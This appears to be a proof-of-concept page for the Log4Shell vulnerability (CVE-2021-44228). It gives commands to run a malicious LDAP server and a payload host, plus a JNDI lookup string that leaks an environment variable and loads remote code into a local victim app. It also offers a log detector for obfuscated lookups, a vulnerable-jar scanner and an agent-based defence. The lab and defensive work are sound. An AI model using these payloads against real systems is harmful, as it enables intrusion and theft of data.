
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability

Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Repository description: Test exploit of CVE-2021-44228
# Test exploit of CVE-2021-44228 (log4shell)

### Preparation

```shell
# Each step returns to the repository root so the relative paths used below keep working.

# Install the Node.js HTTP server
npm -g i http-server

# Build the victim app
cd victim-app
mvn install
cd ..

# Compile the Trojan
cd test-trojan
javac Trojan.java
cd ..

# Build marshalsec (requires Java 8)
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
cd ..

# Build log4j-jndi-be-gone
git clone git@github.com:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew
cd ..
```

### Start the HTTP server hosting a Trojan payload

```shell
cd test-trojan
http-server .
```

### Start a malicious LDAP server
See https://github.com/mbechler/marshalsec
```shell
cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"
```

### Watch for exploit events (optional)
Useful when the victim's stderr is hidden.
```shell
watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'
```

### Exploit

##### Explanation
The victim application logs the following string via a vulnerable `log4j2` library (version 2.14.1):
```java
log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");
```
which executes two attack vectors at once:
1. Sniffing environment variables (`$USER` in this example), which can be seen in the _marshalsec_ LDAP server output:
```
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
```
2. Downloading and executing malicious code that logs the message `!!! BUSTED !!!` to the victim app's standard error stream and creates an empty `/tmp/log4shell-BUSTED-*` file.

For the second vector to work, the following JVM option must be enabled on the victim server:
```properties
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
```
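The logging side of this is what a defender can actually observe: the lookup string has to pass through the application's log pipeline. The detector below is an added example written for this page, not code from the repository; it scans constructed log lines for the lookup shape described above and reports the nested lookups (`${env:USER}` here) that would leak victim data to the LDAP server. Its `normalize` step first collapses the `${lower:..}`, `${upper:..}` and `${..:-..}` lookups that Log4j resolves before the outer lookup, because a plain substring search for `${jndi:` misses text wrapped in them.

```python
import re

# Constructed sample access-log lines (not from the repository): line 2 carries the
# lookup string the victim app logs in this PoC, line 3 hides the word "jndi" behind
# ${lower:..} lookups so that a plain substring search for "${jndi:" misses it.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://127.0.0.1:1389/a/${env:USER}}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:l}dap://127.0.0.1:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /docs?d=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Log4j 2.x lookups that resolve to literal text before the outer lookup is evaluated:
#   ${lower:X} / ${upper:X}   -> X   (case-folding lookups)
#   ${<key>:-X}, e.g. ${::-X} -> X   (default value of an unset key)
_WRAPPER = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # group 1: case-folding lookup
    r"|\$\{[^${}]*:-([^${}]*)\}",        # group 2: default-value lookup
    re.IGNORECASE,
)
_JNDI_START = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_NESTED_NAME = re.compile(r"\$\{(\w+):")


def normalize(text):
    """Collapse innermost wrapper lookups until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def _extract_lookup(text, start):
    """Return the ${...} expression starting at text[start], honouring nested braces."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]  # unterminated lookup: report what is there


def find_jndi_lookups(line):
    """Return [(lookup, [nested lookup names])] for every jndi lookup in one log line."""
    normalized = normalize(line)
    results = []
    for match in _JNDI_START.finditer(normalized):
        lookup = _extract_lookup(normalized, match.start())
        # Lookups nested inside the URL (such as ${env:USER}) are resolved by the victim
        # and sent to the attacker's LDAP server, so they are reported separately.
        nested = [n for n in _NESTED_NAME.findall(lookup) if n.lower() != "jndi"]
        results.append((lookup, nested))
    return results


def scan_log(lines):
    """Return [(1-based line number, lookup, nested names)] over an iterable of log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for lookup, nested in find_jndi_lookups(line):
            hits.append((number, lookup, nested))
    return hits


if __name__ == "__main__":
    for number, lookup, nested in scan_log(SAMPLE_LOG):
        leak = f" (nests {', '.join(nested)})" if nested else ""
        print(f"line {number}: {lookup}{leak}")
```

Run it against a real log with `scan_log(open(path))`; the `${date:yyyy}` line shows that an ordinary lookup on its own is not flagged, only a `jndi:` lookup is.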

##### Execution

```shell
cd victim-app

# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/
```

### Defence

See: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support
```shell
java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar
```

### System-wide defence
Replace all `java` binaries with the script below:

`java.guarded`
```shell
#!/bin/bash
# Forward every invocation to the real binary with the agent attached;
# exec keeps the caller's PID and exit status, and quoting survives paths with spaces.
exec "$(dirname "$0")/java.original" \
  "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"
```

Example:

```shell
cd "$(dirname "$(which java)")"
sudo su
mv java java.original
cp java.guarded java
```
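Both defence sections assume you already know which JVMs load a vulnerable `log4j-core`. The scanner below is an added example for this page (not part of the repository or of log4j-jndi-be-gone): it walks a directory, opens every jar/war/ear, looks one level into bundled jars, and reports archives that still contain `JndiLookup.class`, grading the version found in `pom.properties` against the affected range stated in the advisory at the top of the page. Checking for the class rather than the file name also catches shaded fat jars like the one this PoC builds. The fixture it scans is constructed in a temporary directory and its `.class` entries are dummy bytes.

```python
import io
import os
import tempfile
import zipfile

# Entries that identify log4j-core inside any archive, including shaded fat jars.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Affected range per the advisory: 2.0-beta9 through 2.15.0, except these backports.
FIXED_BACKPORTS = {(2, 12, 2), (2, 12, 3), (2, 3, 1)}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped."""
    parts = []
    for piece in text.split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple((parts + [0, 0, 0])[:3])


def is_affected_version(version):
    v = parse_version(version)
    return (2, 0, 0) <= v <= (2, 15, 0) and v not in FIXED_BACKPORTS


def inspect_archive(zf, label):
    """One finding per archive that still ships JndiLookup.class, else None."""
    names = set(zf.namelist())
    if JNDI_LOOKUP_CLASS not in names:
        return None  # not log4j-core, or the lookup class was already stripped
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    affected = is_affected_version(version) if version else None  # None: version unknown
    return {"archive": label, "version": version, "affected": affected}


def scan_archive(path):
    """Inspect an archive and, one level down, any jar it bundles (WEB-INF/lib etc.)."""
    findings = []
    with zipfile.ZipFile(path) as zf:
        finding = inspect_archive(zf, path)
        if finding:
            findings.append(finding)
        for entry in zf.namelist():
            if entry.lower().endswith(ARCHIVE_SUFFIXES):
                with zipfile.ZipFile(io.BytesIO(zf.read(entry))) as inner:
                    finding = inspect_archive(inner, f"{path}!{entry}")
                    if finding:
                        findings.append(finding)
    return findings


def scan_tree(root):
    """Walk root and collect findings from every archive under it."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(scan_archive(os.path.join(dirpath, name)))
                except zipfile.BadZipFile:
                    pass  # suffix says archive, content says otherwise
    return findings


def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixture: a shaded fat jar carrying log4j-core 2.14.1, a WAR bundling
    the 2.12.2 backport, and an unrelated jar. Class payloads are dummy bytes."""
    stub = b"\xca\xfe\xba\xbe"
    core = lambda v: {POM_PROPERTIES: f"version={v}\n".encode(), JNDI_LOOKUP_CLASS: stub}
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "app-fatjar.jar"), "wb") as f:
        f.write(_zip_bytes({"my/app/Main.class": stub, **core("2.14.1")}))
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(_zip_bytes({"WEB-INF/lib/log4j-core-2.12.2.jar": _zip_bytes(core("2.12.2"))}))
    with open(os.path.join(root, "lib", "other.jar"), "wb") as f:
        f.write(_zip_bytes({"com/example/Foo.class": stub}))


def run_demo():
    """Build the fixture in a temporary directory and return findings with relative labels."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        findings = scan_tree(root)
    for finding in findings:
        finding["archive"] = finding["archive"].replace(root + os.sep, "", 1)
    return findings


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Point `scan_tree` at `$TOMCAT_HOME/webapps` or a deployment root to list the archives that need the agent (or an upgrade); a finding with `"affected": None` means the class is present but no `pom.properties` gave a version, which a shaded jar that strips Maven metadata will produce.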

File Snapshot

```
[4.0K] /data/pocs/def13006638ff8a1d146847bc201b181a0830d14
├── [1.0K] LICENSE
├── [2.7K] README.md
├── [4.0K] test-trojan
│   ├── [1.7K] Trojan.class
│   └── [ 940] Trojan.java
└── [4.0K] victim-app
    ├── [4.0K] core
    │   ├── [1.0K] pom.xml
    │   └── [4.0K] src
    │       └── [4.0K] main
    │           └── [4.0K] java
    │               └── [4.0K] my
    │                   └── [4.0K] app
    │                       ├── [ 362] Main.java
    │                       └── [ 976] MainWrapper.java
    ├── [4.0K] fatjar
    │   └── [2.9K] pom.xml
    ├── [ 675] pom.xml
    └── [4.0K] web
        ├── [1.1K] pom.xml
        └── [4.0K] src
            └── [4.0K] main
                └── [4.0K] webapp
                    ├── [ 193] index.jsp
                    └── [4.0K] WEB-INF
                        └── [ 307] web.xml

14 directories, 12 files
```